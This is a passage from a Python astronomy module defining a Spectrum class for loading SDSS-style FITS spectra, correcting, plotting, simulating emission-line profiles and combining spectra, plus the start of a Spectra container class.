@normalized.deleter\n def normalized(self):\n raise ValueError(\"The 'normalized' property may not be deleted!\")\n\n def _calc_agn_dist(self, bpt_1, bpt_2, ref_point):\n assert bpt_1 in self.data.keys() and bpt_2 in self.data.keys()\n # Calculate x and y distance between this object and the reference point in the BPT plane\n return self.data[bpt_1] - ref_point[0], self.data[bpt_2] - ref_point[1]\n\n def calc_agn_frac(self, bpt_1, bpt_2, ref_point):\n \"\"\"\n Calculate the AGN fraction of an object based on BPT data.\n\n :param bpt_1: str\n The name of the first BPT ratio, should be defined in self.data\n :param bpt_2: str\n The name of the second BPT ratio, should be defined in self.data\n :param ref_point: tuple\n The reference point to calculate the distance from\n :return agn_frac: float\n The AGN fraction of the object, defined as 1 / distance.\n \"\"\"\n dx, dy = self._calc_agn_dist(bpt_1, bpt_2, ref_point)\n d = np.hypot(dx, dy)\n # AGN fraction = 1 / distance\n self.data[\"agn_frac\"] = 1 / d\n return self.data[\"agn_frac\"]\n\n def k01_agn_class(self, bpt_x, bpt_y):\n \"\"\"\n Calculate whether the spectrum is classified as an AGN by the Kewley et al. 
2001 classification scheme.\n\n :param bpt_x: str\n The name of the x axis BPT ratio, should be defined in self.data\n :param bpt_y: str\n The name of the y axis BPT ratio, should be defined in self.data\n :return agn: bool\n True if object is an AGN, otherwise False.\n \"\"\"\n k_line = 0.61 / (self.data[bpt_x] - 0.47) + 1.19\n agn = self.data[bpt_y] > k_line or self.data[bpt_x] >= 0.47\n self.data[\"agn_class\"] = agn\n return self.data[\"agn_class\"]\n\n def plot(self, convolve_width=0, line_labels=True, emline_color=\"rebeccapurple\", absorp_color=\"darkgoldenrod\", cline_color=\"cyan\",\n overwrite=False, fname=None, backend='plotly', _range=None, ylim=None, title_text=None, normalized=False,\n plot_model=None, shade_reg=None, overlays=None):\n \"\"\"\n Plot the spectrum.\n\n :param convolve_width: optional, int\n The width of convolution performed before plotting the spectrum with a Box1DKernel\n :param line_labels: optional, bool\n Whether or not to plot labels for emission lines, absorption lines, and coronal lines. Default is True.\n :param emline_color: optional, str\n If backend is pyplot, this specifies the color of emission lines plotted. Default is 'rebeccapurple'.\n :param absorp_color: optional, str\n If backend is pyplot, this specifies the color of absorption lines plotted. Default is 'darkgoldenrod'.\n :param cline_color: optional, str\n If backend is pyplot, this specifies the color of coronal lines plotted. Default is 'cyan'.\n :param overwrite: optional, bool\n If true, overwrites the file if it already exists. Otherwise it is not replotted. Default is false.\n :param fname: optional, str\n The path and file name to save the plot to.\n :param backend: optional, str\n May be 'pyplot' to use the pyplot module or 'plotly' to use the plotly module for plotting. Default is\n 'plotly'.\n :param _range: optional, tuple\n Limits on the x-data between two wavelengths.\n :param ylim: optional, tuple\n Limits on the y-data between two fluxes.\n :param title_text: optional, str\n Text to append to the title of the plot.\n :param normalized: bool\n Whether or not to normalize the flux before plotting.\n :param plot_model: optional, tuple\n A tuple of two strings corresponding to keys for the data dict to plot x and y data overtop of the spectrum.\n :param shade_reg: optional, list\n A list of tuples indicating region(s) within the plot to shade\n :param overlays: optional, list\n A list containing other Spectrum objects (not a Spectra/Stack object) which are to be plotted in addition\n to the current Spectrum object.\n :return None:\n \"\"\"\n # Make sure corrections have been applied\n self.apply_corrections()\n if not fname:\n fname = os.path.join(self.output_path, self.name.replace(' ', '_') + '.spectrum') + ('.pdf', '.html')[\n backend == 'plotly']\n if os.path.exists(fname) and not overwrite:\n return\n\n # Convolve the spectrum\n if convolve_width > 0:\n kernel = astropy.convolution.Box1DKernel(convolve_width)\n spectrum = astropy.convolution.convolve(self.flux, kernel)\n error = astropy.convolution.convolve(self.error, kernel)\n else:\n spectrum = self.flux\n error = self.error\n # spectrum[spectrum < 0.] = 0.\n # error[error < 0.] 
= 0.\n if _range:\n good = np.where((_range[0] < self.wave) & (self.wave < _range[1]))[0]\n wave = self.wave[good]\n spectrum = spectrum[good]\n error = error[good]\n else:\n wave = self.wave\n \n if normalized:\n mu = np.nanmean(spectrum)\n sigma = np.nanstd(spectrum)\n spectrum = (spectrum - mu) / sigma\n error = error / sigma\n \n bad = ~np.isfinite(spectrum)\n if np.isfinite(np.nanmedian(spectrum)):\n spectrum[bad] = np.nanmedian(spectrum)\n else:\n spectrum[bad] = 0. if normalized else 1.\n if np.isfinite(np.nanmedian(error)):\n error[bad] = np.nanmedian(error)\n else:\n error[bad] = 1.\n\n # Standard matplotlib backend (non-interactive)\n if backend == 'pyplot':\n # Plot the spectrum and error\n fig, ax = plt.subplots(figsize=(20, 10))\n linewidth = .5\n linestyle = '--'\n ax.plot(wave, spectrum, '-', color='k', lw=linewidth, label=self.name)\n if plot_model is not None:\n if plot_model[0] in self.data and plot_model[1] in self.data:\n ax.plot(self.data[plot_model[0]], self.data[plot_model[1]], '-', color='r', lw=linewidth)\n else:\n print(f\"WARNING: {plot_model[0]} or {plot_model[1]} not found in {self.name}'s data!\")\n if overlays is not None:\n for overlay in overlays:\n overlay.apply_corrections()\n if convolve_width > 0:\n kernel = astropy.convolution.Box1DKernel(convolve_width)\n speci = astropy.convolution.convolve(overlay.flux, kernel)\n erri = astropy.convolution.convolve(overlay.error, kernel)\n else:\n speci = overlay.flux\n erri = overlay.error\n # # speci[speci < 0] = 0\n # erri[erri < 0] = 0\n if _range:\n good = np.where((_range[0] < overlay.wave) & (overlay.wave < _range[1]))[0]\n wavei = overlay.wave[good]\n speci = speci[good]\n erri = erri[good]\n else:\n wavei = overlay.wave\n if normalized:\n mui = np.nanmean(speci)\n sigmi = np.nanstd(speci)\n speci = (speci - mui) / sigmi\n erri = erri / sigmi\n bad = ~np.isfinite(speci)\n if np.isfinite(np.nanmedian(speci)):\n speci[bad] = np.nanmedian(speci)\n else:\n speci[bad] = 0. 
if normalized else 1.\n if np.isfinite(np.nanmedian(erri)):\n erri[bad] = np.nanmedian(erri)\n else:\n erri[bad] = 1.\n ax.plot(wavei, speci, '-', lw=.5, label=overlay.name)\n ax.legend()\n else:\n ax.fill_between(wave, spectrum - error, spectrum + error, color='mediumaquamarine', alpha=0.5)\n\n # Plot emission and absorption lines\n if line_labels:\n # OVI, Ly-alpha, NV, OI, CII, SiIV, SiIV/OIV, CIV, HeII\n # OIII, AlIII, CIII, CII, NeIV, MgII, [OII]\n # [OII], H-delta, H-gamma, [OIII], H-beta, [OIII], [OIII], [OI], [OI]\n # [NII], H-alpha, [NII], [SII], [SII]\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3727.092,\n 3729.875, 4102.890, 4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6549.860, 6564.610, 6585.270, 6718.290, 6732.670])\n for line in emlines:\n ax.axvline(line, color=emline_color, lw=linewidth, linestyle=linestyle, alpha=0.5)\n # Ne V, Ne V*, Fe VII, Fe V, Fe V, Ne III (not coronal), Fe V, Fe VII, Fe VI, Fe VII, Fe VI, Fe VII, Fe XIV,\n # Ca V, Fe VI, Ar X, Fe VII, Fe VII*, Fe X, Fe XI\n clines = np.array(\n [3346.790, 3426.850, 3759, 3839, 3891, 3970, 4181, 4893, 5146, 5159, 5176, 5276, 5303, 5309, 5335,\n 5533, 5720, 6087, 6374.510, 7891.800])\n for line in clines:\n ax.axvline(line, color=cline_color, lw=linewidth * 2, linestyle=linestyle, alpha=0.75)\n\n # Ca K, Ca H, Mg1b, Na, CaII, CaII, CaII\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n for line in abslines:\n ax.axvline(line, color=absorp_color, lw=linewidth, linestyle=linestyle, alpha=0.5)\n\n # Set up axis labels and formatting\n fontsize = 20\n ax.set_xlabel(r'$\\lambda_{\\rm{rest}}$ ($\\rm{\\AA}$)', fontsize=fontsize)\n if not normalized:\n ax.set_ylabel(r'$f_\\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\\rm{\\AA}^{-1}$)', fontsize=fontsize)\n else:\n ax.set_ylabel(r'$f_\\lambda$ (normalized)', fontsize=fontsize)\n title = '%s, $z=%.5f$' % (self.name, self.redshift)\n if title_text:\n title += ', ' + title_text\n ax.set_title(title, fontsize=fontsize)\n ax.tick_params(axis='both', labelsize=fontsize - 2)\n if wave.size > 1:\n ax.set_xlim(np.nanmin(wave), np.nanmax(wave))\n if ylim:\n ax.set_ylim(ylim)\n elif wave.size > 1:\n ax.set_ylim(0., np.nanmax(spectrum))\n if shade_reg:\n for sr in shade_reg:\n ax.axvspan(*sr, color='grey', alpha=0.5)\n\n fig.savefig(fname, dpi=300, bbox_inches='tight')\n plt.clf()\n plt.cla()\n plt.close('all')\n\n # Interactive HTML plots through the plotly backend\n elif backend == 'plotly':\n fig = plotly.subplots.make_subplots(rows=1, cols=1)\n linewidth = .5\n good = np.where(np.isfinite(spectrum) & np.isfinite(error))[0]\n fig.add_trace(plotly.graph_objects.Scatter(x=wave, y=spectrum, line=dict(color='black', width=linewidth),\n name='Data' if overlays is None else self.name + ' data',\n showlegend=False if overlays is None else True))\n fig.add_trace(plotly.graph_objects.Scatter(x=wave[good], y=(spectrum + error)[good],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)' if overlays is None else 'rgba(0, 0, 0, 0.6)',\n name='Upper Bound' if overlays is None else self.name + ' upper bound',\n showlegend=False if overlays is None else True))\n fig.add_trace(plotly.graph_objects.Scatter(x=wave[good], y=(spectrum - error)[good],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)' if overlays is None else 'rgba(0, 0, 0, 0.6)',\n 
fill='tonexty', name='Lower Bound' if overlays is None else self.name + ' lower bound',\n showlegend=False if overlays is None else True))\n if plot_model:\n if plot_model[0] in self.data and plot_model[1] in self.data:\n fig.add_trace(plotly.graph_objects.Scatter(x=self.data[plot_model[0]], y=self.data[plot_model[1]],\n line=dict(color='#e0191c', width=linewidth),\n name='Model', showlegend=False))\n else:\n print(f\"WARNING: {plot_model[0]} or {plot_model[1]} not found in {self.name}'s data!\")\n if overlays is not None:\n colorlist = ['#7fffd4', '#8a2be2', '#d2691e', '#6495ed', '#006400', '#e9967a', '#2f4f4f', '#1e90ff',\n '#adff2f', '#4b0082', '#20b2aa', '#7b68ee']\n for i, overlay in enumerate(overlays):\n overlay.apply_corrections()\n if convolve_width > 0:\n kernel = astropy.convolution.Box1DKernel(convolve_width)\n speci = astropy.convolution.convolve(overlay.flux, kernel)\n erri = astropy.convolution.convolve(overlay.error, kernel)\n else:\n speci = overlay.flux\n erri = overlay.error\n # speci[speci < 0] = 0\n # erri[erri < 0] = 0\n if _range:\n good = np.where((_range[0] < overlay.wave) & (overlay.wave < _range[1]))[0]\n wavei = overlay.wave[good]\n speci = speci[good]\n erri = erri[good]\n else:\n wavei = overlay.wave\n if normalized:\n mui = np.nanmean(speci)\n sigmi = np.nanstd(speci)\n speci = (speci - mui) / sigmi\n erri = erri / sigmi\n bad = ~np.isfinite(speci)\n if np.isfinite(np.nanmedian(speci)):\n speci[bad] = np.nanmedian(speci)\n else:\n speci[bad] = 0. if normalized else 1.\n if np.isfinite(np.nanmedian(erri)):\n erri[bad] = np.nanmedian(erri)\n else:\n erri[bad] = 1.\n good = np.where(np.isfinite(speci) & np.isfinite(erri))[0]\n fig.add_trace(plotly.graph_objects.Scatter(x=wavei, y=speci, line=dict(color=colorlist[i % len(colorlist)], width=linewidth),\n name=overlay.name + ' data', showlegend=True))\n fig.add_trace(plotly.graph_objects.Scatter(x=wavei[good], y=(speci+erri)[good], line=dict(color=colorlist[i % len(colorlist)], width=0),\n name=overlay.name + ' upper bound',\n fillcolor='rgba(' + str(int(colorlist[i % len(colorlist)][1:3], 16)) +\n ', ' + str(int(colorlist[i % len(colorlist)][3:5], 16)) +\n ', ' + str(int(colorlist[i % len(colorlist)][5:7], 16)) + ', 0.6)',\n showlegend=True))\n fig.add_trace(plotly.graph_objects.Scatter(x=wavei[good], y=(speci-erri)[good], line=dict(color=colorlist[i % len(colorlist)], width=0),\n fillcolor='rgba(' + str(int(colorlist[i % len(colorlist)][1:3], 16)) +\n ', ' + str(int(colorlist[i % len(colorlist)][3:5], 16)) +\n ', ' + str(int(colorlist[i % len(colorlist)][5:7], 16)) + ', 0.6)',\n fill='tonexty', name=overlay.name + ' lower bound', showlegend=True))\n fig.update_layout(showlegend=True)\n\n # Plot emission and absoprtion lines\n if line_labels:\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3346.790, 3426.850, 3727.092,\n 3729.875, 4102.890, 4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6374.510, 6549.860, 6564.610, 6585.270, 6718.290, 6732.670, 7891.800])\n clines = np.array(\n [3346.790, 3426.850, 3759, 3839, 3891, 3970, 4181, 4893, 5146, 5159, 5176, 5276, 5303, 5309, 5335,\n 5533, 5720, 6087, 6374.510, 7891.800])\n cline_names = np.array(\n ['[Ne V]', '[Ne V]*', '[Fe VII]', '[Fe V]', '[Fe V]', '[Ne III]', '[Fe V]', '[Fe VII]', '[Fe VI]',\n '[Fe VII]', '[Fe VI]', '[Fe VII]', '[Fe XIV]', '[Ca V]', '[Fe VI]', '[Ar X]', '[Fe VII]', '[Fe VII]*',\n '[Fe X]', '[Fe 
XI]'], dtype=str\n )\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n for line in emlines:\n fig.add_vline(x=line, line_width=linewidth, line_dash='dash', line_color='#663399')\n for line, name in zip(clines, cline_names):\n fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666',\n annotation_text=name, annotation_position='top right', annotation_font_size=12)\n for line in abslines:\n fig.add_vline(x=line, line_width=linewidth, line_dash='dash', line_color='#d1c779')\n\n if not normalized:\n y_title = '$f_\\\\lambda\\\\ (10^{-17} {\\\\rm erg} {\\\\rm s}^{-1} {\\\\rm cm}^{-2} Å^{-1})$'\n else:\n y_title = '$f_\\\\lambda\\\\ ({\\\\rm normalized})$'\n title = '${\\\\rm %s}, z=%.5f$' % (self.name, self.redshift)\n if overlays is not None:\n title = '$' + '\\ \\| \\ '.join([r'{\\rm %s}, z=%.5f' % (name, redshift) for name, redshift in zip(\n [self.name] + [o.name for o in overlays], [self.redshift] + [o.redshift for o in overlays]\n )]) + '$'\n if title_text:\n if '$' in title_text:\n title = '$' + title.replace('$','') + '\\ \\| \\ ' + title_text.replace('$','') + '$'\n else:\n title += ', ' + title_text\n fig.update_layout(\n yaxis_title=y_title,\n xaxis_title='$\\\\lambda_{\\\\rm rest}\\\\ (Å)$',\n title=title,\n hovermode='x',\n template='plotly_white'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n if wave.size > 1:\n _range = (np.nanmin(wave), np.nanmax(wave))\n _yrange = (0, np.nanmax(spectrum) + .3)\n else:\n _range = None\n _yrange = None\n fig.update_xaxes(\n range=_range,\n constrain='domain'\n )\n fig.update_yaxes(\n range=_yrange if not ylim else ylim,\n constrain='domain'\n )\n fig.write_html(fname, include_mathjax=\"cdn\")\n # fig.write_image(fname.replace('.html', '.pdf'), width=1280, height=540)\n\n def save_pickle(self):\n \"\"\"\n Save the object contents to a pickle file\n\n :return None:\n \"\"\"\n with open(os.path.join(self.output_path, self.name.replace(' ', '_') + '.data.pkl'), 'wb') as handle:\n pickle.dump(self, handle)\n\n @classmethod\n def from_fits(cls, filepath, name, save_all_data=False):\n \"\"\"\n Create a spectrum object from a fits file\n This function was adapted from BADASS3, created by Remington Sexton, https://github.com/remingtonsexton/BADASS3.\n\n :param filepath: str\n The path to the fits file\n :param name: str, optional\n The name of the spectrum.\n :param save_all_data: bool\n Whether or not to append data within the FITS file to the object's data dictionary\n :return cls: Spectrum\n The Spectrum object created from the fits file.\n \"\"\"\n # Load the data\n data_dict = {}\n with astropy.io.fits.open(filepath) as hdu:\n\n specobj = copy.deepcopy(hdu[2].data)\n z = specobj['z'][0]\n if name is None:\n try:\n name = specobj['SPECOBJID'][0]\n if type(name) is str:\n name = name.strip()\n else:\n name = str(name)\n except:\n # If a SPECOBJID key can't be found, just name from the file name\n name = filepath.split(os.sep)[-1].split('.')[0]\n\n hdr = copy.deepcopy(hdu[0].header)\n try:\n ra = hdr['RA']\n dec = hdr['DEC']\n except KeyError:\n ra = specobj['PLUG_RA'][0]\n dec = specobj['PLUG_DEC'][0]\n\n t = copy.deepcopy(hdu[1].data)\n q = 
copy.deepcopy(hdu[3].data)\n\n # Unpack the spectra\n flux = t['flux']\n wave = np.power(10, t['loglam'])\n error = np.sqrt(1 / t['ivar'])\n try:\n sky = t['sky']\n except:\n sky = None\n # and_mask = t['and_mask']\n\n if save_all_data:\n for key in specobj.names:\n if key not in ('z', 'PLUG_RA', 'PLUG_DEC'):\n data_dict[key] = specobj[key]\n for key in hdr:\n if key not in data_dict.keys() and key not in ('RA', 'DEC'):\n data_dict[key] = hdr[key]\n for key in t.names:\n if key not in data_dict.keys() and key not in ('flux', 'loglam', 'ivar', 'sky'):\n data_dict[key] = t[key]\n for key in q.names:\n if key not in data_dict.keys():\n data_dict[key] = q[key]\n\n del t\n del q\n del hdr\n del specobj\n\n # Interpolating over bad pixels\n bad = np.where(~np.isfinite(flux) & ~np.isfinite(error))[0]\n\n # error[bad] = np.nanmedian(error)\n\n # Insert additional nans next to bad pixels\n def insert_nans(spec, _bad):\n all_bad = np.unique(np.concatenate((_bad - 1, _bad, _bad + 1)))\n all_bad = np.array([ab for ab in all_bad if 0 < ab < len(spec)])\n try:\n spec[all_bad] = np.nan\n return spec\n except IndexError:\n return spec\n\n def nan_helper(spec):\n return np.isnan(spec), lambda q: q.nonzero()[0]\n\n flux = insert_nans(flux, bad)\n nans, x = nan_helper(flux)\n if len(flux[~nans]) > 0:\n flux[nans] = np.interp(x(nans), x(~nans), flux[~nans])\n\n error = insert_nans(error, bad)\n nans, x = nan_helper(error)\n if len(error[~nans]) > 0:\n error[nans] = np.interp(x(nans), x(~nans), error[~nans])\n\n coord = astropy.coordinates.SkyCoord(ra=ra, dec=dec, unit=(u.deg, u.deg), frame='fk5')\n try:\n table = astroquery.irsa_dust.IrsaDust.get_query_table(coord, section='ebv')\n ebv = table['ext SandF mean'][0]\n except:\n ebv = 0.04\n\n # Convert to native endianness so numba works properly\n if wave.dtype.byteorder != '=':\n wave.byteswap(inplace=True)\n wave = wave.newbyteorder('=')\n if flux.dtype.byteorder != '=':\n flux.byteswap(inplace=True)\n flux = flux.newbyteorder('=')\n if error.dtype.byteorder != '=':\n error.byteswap(inplace=True)\n error = error.newbyteorder('=')\n\n return cls(wave, flux, error, sky, redshift=z, ra=ra / 15, dec=dec, ebv=ebv, name=name, **data_dict)\n\n \n @staticmethod\n def emission_line(true_line, amp, fwhm, voff, h=None, eta_mix=None, disp_inst=None, min_wave=3000, max_wave=8000, \n size=10_000, profile=\"GH\"):\n\n # Logarithmically spaced wavelength grid\n wave = np.geomspace(min_wave, max_wave, size)\n frac = wave[1]/wave[0]\n\n # Optionally add some intrinsic dispersion to simulate a real spectrograph\n # Size of every pixel in angstroms\n dwave = (frac - 1) * wave\n # Intrinsic dispersion in pixels per pixel\n if disp_inst is None:\n disp_inst = 1 / dwave\n # FWHM dispersion in angstroms\n fwhm_inst = 2.3548 * disp_inst * dwave\n\n # Constant velocity scale per pixel -- which is why we choose a logarithmically spaced grid\n c = const.c.to('km/s').value\n velscale = np.log(frac) * c\n\n # Add instrumental fwhm in quadrature\n fwhm_interp = scipy.interpolate.interp1d(wave, fwhm_inst, kind='linear', bounds_error=False, fill_value=(1.e-10, 1.e-10))\n fwhm_inst_kms = (fwhm_interp(true_line) / true_line) * c\n fwhm0 = np.hypot(fwhm, fwhm_inst_kms)\n\n # Convert from km/s to pixels\n fwhm_pix = fwhm0 / velscale\n sigma = (fwhm0/2.3548) / velscale\n shift = voff / velscale\n\n # Convert x from angstroms to pixels\n x_pix = np.array(range(len(wave)))\n pix_interp = scipy.interpolate.interp1d(wave, x_pix, kind='linear', bounds_error=False, fill_value=(1.e-10, 1.e-10))\n 
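# Map the rest-frame line center from wavelength to pixel coordinates, then add the velocity offset\n        # (voff was already converted from km/s to pixels above via the constant velocity scale of the log grid)\n        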
center_pix = pix_interp(true_line) + shift\n\n if profile == 'random':\n profile = np.random.choice([\"GH\", \"L\", \"V\"])\n\n if profile in (\"GH\", \"G\"):\n # Calculate moments and normalization constants\n w = (x_pix - center_pix) / sigma\n if h is None:\n h = [0, 0]\n moments = np.arange(3, len(h) + 3)\n norm = np.sqrt(scipy.special.factorial(moments)*2**moments)\n coeff = np.concatenate(([1, 0, 0], h/norm))\n\n # Combine Gaussian and Hermite profiles\n flux = 1 / (np.sqrt(2 * np.pi) * sigma) * np.exp(-w**2/2) * np.polynomial.hermite.hermval(w, coeff)\n flux[flux < 0] = 0\n\n elif profile == \"L\":\n # Calculate Lorentzian profile\n gamma = 0.5 * fwhm_pix\n flux = (gamma**2 / (gamma**2 + (x_pix - center_pix)**2))\n\n elif profile == \"V\":\n # Calculate pseudo-Voigt profile -- combination of Gaussian and Lorentzian by some mixing parameter eta\n w = (x_pix - center_pix) / sigma\n gauss = 1 / (np.sqrt(2 * np.pi) * sigma) * np.exp(-w**2/2)\n gamma = 0.5 * fwhm_pix\n lorentz = 1 / np.pi * gamma / (gamma**2 + (x_pix - center_pix)**2)\n\n if eta_mix is None:\n eta_mix = 0.5\n flux = ((eta_mix * gauss) + ((1 - eta_mix) * lorentz))\n\n else:\n raise ValueError(f\"Invalid profile type {profile}! Must be one of 'GH', 'G', 'L', or 'V'\")\n\n # Renormalize\n flux /= np.nanmax(flux)\n flux *= amp\n\n return wave, flux\n\n @classmethod\n def simulated(cls, true_line, baseline, amp, fwhm, voff, alpha=None, h=None, eta_mix=None, noise_amp=None, seed=None,\n disp_inst=None, min_wave=3000, max_wave=8000, size=10_000, profile=\"GH\", name=None):\n \"\"\"\n Create a simulated spectrum object.\n\n :param true_line: float\n The wavelength of the emission line to model, in angstroms.\n :param baseline: float\n The baseline flux of the spectrum, in 10^-17 erg/s/cm^2/angstrom.\n :param amp: float\n The amplitude of the Gaussian profile, in 10^-17 erg/s/cm^2/angstrom.\n :param fwhm: float\n The full-width at half-maximum of the Gaussian profile (h2), in km/s.\n :param voff: float\n The velocity offset of the Gaussian profile (h1), in km/s.\n :param alpha: float\n Simple power law slope.\n :param h: array\n Array of hermite moments for order 3 and higher.\n :param eta_mix: float\n Mixing parameter of Pseudo-Voigt profile.\n :param noise_amp: float, optional\n Amplitude of random noise to be added, in 10^-17 erg/s/cm^2/angstrom.\n :param disp_inst: array, optional\n Intrinsic dispersion in pixels per pixel.\n :param profile: str, optional\n The line profile to use - \"GH\" or \"G\" for Gauss-Hermite, \"L\" for lorentzian, \"V\" for pseudo-Voigt\n :param min_wave: float\n Minimum wavelength in the grid.\n :param max_wave: float\n Maximum wavelength in the grid.\n :param size: integer\n The number of datapoints in the wavelength/pixel grid.\n :param name: string\n The name of the spectrum.\n \"\"\"\n if type(true_line) in (int, float):\n wave, flux = cls.emission_line(true_line, amp, fwhm, voff, h, eta_mix, disp_inst, min_wave, max_wave, \n size, profile)\n elif type(true_line) in (list, np.ndarray):\n flux = np.zeros(size)\n # Iterate over any number of potential values for the true wavelength, amplitude, FWHM, etc. 
to \n # create superpositions of many line profiles\n for ti, ampi, fwhmi, voffi, hi, etai, prfi in zip(true_line, amp, fwhm, voff, h, eta_mix, profile):\n wave, flux_i = cls.emission_line(ti, ampi, fwhmi, voffi, hi, etai, disp_inst, min_wave, max_wave,\n size, prfi)\n flux += flux_i\n else:\n raise ValueError(\"true_line must be one of: int, float, list, np.ndarray\")\n\n # Normalize and apply amplitude\n # flux = flux / np.nanmax(flux) * amp\n\n # Add random noise\n if noise_amp is None:\n noise_amp = baseline / 100\n\n # Truncate when below the noise level\n rng = np.random.default_rng(seed)\n noise = rng.normal(0, noise_amp, wave.size)\n flux[np.abs(flux) <= np.nanmedian(noise)] = 0\n flux[np.abs(flux) > np.nanmedian(noise)] -= np.nanmedian(noise)\n\n # Make the ends symmetric\n flux[(flux > -1e-6) & (flux < 1e-6)] = 0\n flux[0] = flux[1]\n flux[-1] = flux[-2]\n\n # Add simulated power law and noise\n if alpha is None:\n alpha = 0\n wave_b = 0.5*(np.nanmax(wave) + np.nanmin(wave))\n continuum = baseline * (wave / wave_b) ** alpha\n flux += continuum\n flux += noise\n\n # Assume ideal uniform error\n error = np.array([noise_amp] * len(flux))\n\n if name is None:\n unique_id = str(uuid.uuid1().hex)\n name = f'{unique_id:s}'\n\n snr = np.abs(amp / noise_amp)\n \n return cls(wave, flux, error, redshift=0, name=name, snr=snr, amp=amp, noise_amp=noise_amp)\n\n def to_numpy(self, _slice=None):\n # Convert to a lightweight numpy record array, with just wave, flux, and error information\n if _slice is None:\n return np.array([(w, f, e) for w, f, e in zip(self.wave, self.flux, self.error)],\n dtype=[('wave', float), ('flux', float), ('err', float)]).view(np.recarray)\n else:\n return np.array([(w, f, e) for w, f, e in zip(self.wave[_slice], self.flux[_slice], self.error[_slice])],\n dtype=[('wave', float), ('flux', float), ('err', float)]).view(np.recarray)\n\n def save_numpy(self, fname=None, compress=True, _slice=None):\n # Save to a numpy archive file for future use\n if not self.corrected:\n self.apply_corrections()\n record = self.to_numpy(_slice=_slice)\n save = np.save if not compress else np.savez\n if not fname:\n if compress:\n fname = self.name + '.npz'\n else:\n fname = self.name + '.npy'\n save(fname, record)\n\n @classmethod\n def from_numpy(cls, filepath, **kwargs):\n # Create a spectrum object from a previously saved npy or npz file\n array = np.load(filepath)\n if type(array) is np.lib.npyio.NpzFile:\n array = array.f.arr_0\n return cls(wave=array['wave'], flux=array['flux'], error=array['err'], **kwargs)\n\n # Arithmetic definitions (unused in the rest of the code, but here for convenience)\n # Error propagation is correctly attributed in each case (+, -, *, /) to the error spectrum of the new object\n\n def __add__(self, other):\n # Add the flux of two spectra together\n\n assert np.all(self.wave == other.wave), \"Cannot add two spectra if their wave arrays do not match!\"\n assert self.corrected & other.corrected, \"Cannot add two spectra unless both have been properly corrected for\" \\\n \"redshift and extinction!\"\n assert (self.normalized & other.normalized) | ((not self.normalized) & (not other.normalized)), \\\n \"Cannot add two spectra unless both or neither are normalized!\"\n result = Spectrum(self.wave, (self.flux + other.flux), np.hypot(self.error, other.error), name='Added spectrum')\n result._normalized = self.normalized & other.normalized\n return result\n\n def __sub__(self, other):\n # Subtract the flux from two spectra\n\n assert np.all(self.wave == 
other.wave), \"Cannot subtract two spectra if their wave arrays do not match!\"\n assert self.corrected & other.corrected, \"Cannot subtract two spectra unless both have been properly corrected for\" \\\n \"redshift and extinction!\"\n assert (self.normalized & other.normalized) | ((not self.normalized) & (not other.normalized)), \\\n \"Cannot subtract two spectra unless both or neither are normalized!\"\n result = Spectrum(self.wave, (self.flux - other.flux), np.hypot(self.error, other.error), name='Subtracted spectrum')\n result._normalized = self.normalized & other.normalized\n return result\n\n def __mul__(self, other):\n # Multiply the flux from two spectra\n\n assert np.all(self.wave == other.wave), \"Cannot multiply two spectra if their wave arrays do not match!\"\n assert self.corrected & other.corrected, \"Cannot multiply two spectra unless both have been properly corrected for\" \\\n \"redshift and extinction!\"\n assert (self.normalized & other.normalized) | ((not self.normalized) & (not other.normalized)), \\\n \"Cannot multiply two spectra unless both or neither are normalized!\"\n result = Spectrum(self.wave, (self.flux * other.flux), np.hypot(other.flux*self.error, self.flux*other.error),\n name='Multiplied spectrum')\n result._normalized = self.normalized & other.normalized\n return result\n\n def __truediv__(self, other):\n # Divide the flux from two spectra\n\n assert np.all(self.wave == other.wave), \"Cannot divide two spectra if their wave arrays do not match!\"\n assert self.corrected & other.corrected, \"Cannot divide two spectra unless both have been properly corrected for\" \\\n \"redshift and extinction!\"\n assert (self.normalized & other.normalized) | ((not self.normalized) & (not other.normalized)), \\\n \"Cannot divide two spectra unless both or neither are normalized!\"\n result = Spectrum(self.wave, (self.flux / other.flux),\n (self.flux / other.flux)*np.hypot(self.error/self.flux, other.error/other.flux),\n name='Divided spectrum')\n result._normalized = self.normalized & other.normalized\n return result\n\n\nclass Spectra(dict):\n \"\"\"\n An extension of the base Python dictionary for storing Spectrum objects.\n \"\"\"\n\n default_keys = Spectrum.__slots__\n\n def to_numpy(self, keys=None):\n \"\"\"\n Unpacks values to a dict of numpy arrays.\n\n :param keys: str, iterable\n A list of strings containing the keys to unpack, defaults to None for all keys.\n\n :return out: dict\n A dictionary containing the numpy arrays.\n \"\"\"\n if keys is None:\n keys = self.default_keys\n else:\n t = type(keys)\n if t is str:\n keys = [keys]\n out = {}\n for key in keys:\n t = type(getattr(self[0], key))\n out[key] = np.array([getattr(self[sname], key) for sname in self], dtype=t)\n return out\n\n def add_spec(self, spec):\n \"\"\"\n Add a spectrum to the spectra dictionary with spec.name as a key.\n\n :param spec: Spectrum object\n The object to add to the dictionary.\n :return: None\n \"\"\"\n self[spec.name] = spec\n\n def correct_spectra(self, r_v=3.1):\n \"\"\"\n Apply velocity and extinction corrections to all spectra in the dictionary.\n\n :param r_v: float, iterable\n The extinction ratio (or ratios) A(V)/E(B-V) to use in the corrections for each spectrum.\n If float, the same correction is 